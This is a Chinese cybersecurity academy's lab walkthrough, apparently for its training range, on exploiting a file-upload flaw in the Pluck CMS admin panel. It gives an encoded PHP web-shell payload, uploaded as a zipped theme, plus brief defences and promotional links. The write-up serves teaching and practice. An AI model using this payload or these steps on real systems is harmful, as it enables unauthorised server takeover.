本文由“网络安全检测与防护技术国家地方联合工程研究中心深圳分中心——东塔网络安全学院”总结归纳
文件上传实战之pluck
今天,给大家介绍一下“东塔攻防世界”其中的一个靶场:“文件上传实战之pluck”。
一、实验介绍
1.pluck是一个小型简单的内容管理系统,由PHP写成。即使你没有编程语言知识,也可以很容易地使用它来管理站点,功能有给页面插照片、在blog里写文章、分享照片等
2.pluck cms后台存在文件上传漏洞,攻击者可以利用该漏洞获取获取服务器权限
二、实验目的
1.掌握pluck的概念
2.了解当Pluck CMS后台存在文件上传漏洞时,攻击者怎么利用该漏洞获取服务器权限。
三、实验步骤
1.打开实验靶场,了解上传点,以及利用方法,登录密码为:admin
2.准备一个info.php,内容为:file_put_contents('hack.php',base64_decode('PD9waHAgZXZhbCgkX0dFVFsnYSddKTs/Pg=='));?>
3.然后打包压缩成shell.zip,上传安装主题,然后点击回到主题页,此时触发文件包含。
四、防御方法
1.对上传的文件进行严格检测
2.上传后的文件名进行重命名,并且隐藏上传后文件的路径,不容易被猜到
速度登录https://labs.do-ta.com/ GET起来
现在注册,立得50积分哟 ✌
东塔网络安全学院在各大平台均上线了各项活动和学习内容,快快登录以下各大平台学习起来吧~
微博、腾讯课堂、知乎、今日头条:
东塔网络安全学院
抖音:东塔网络安全培训
哔哩哔哩:东塔网络安全
了解更多活动和咨询欢迎微信添加:dongtakefu
-免费获取学习资料
电子书籍、试听课程-
原文始发于微信公众号(东塔网络安全学院):靶场科普 | 文件上传实战之pluck
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论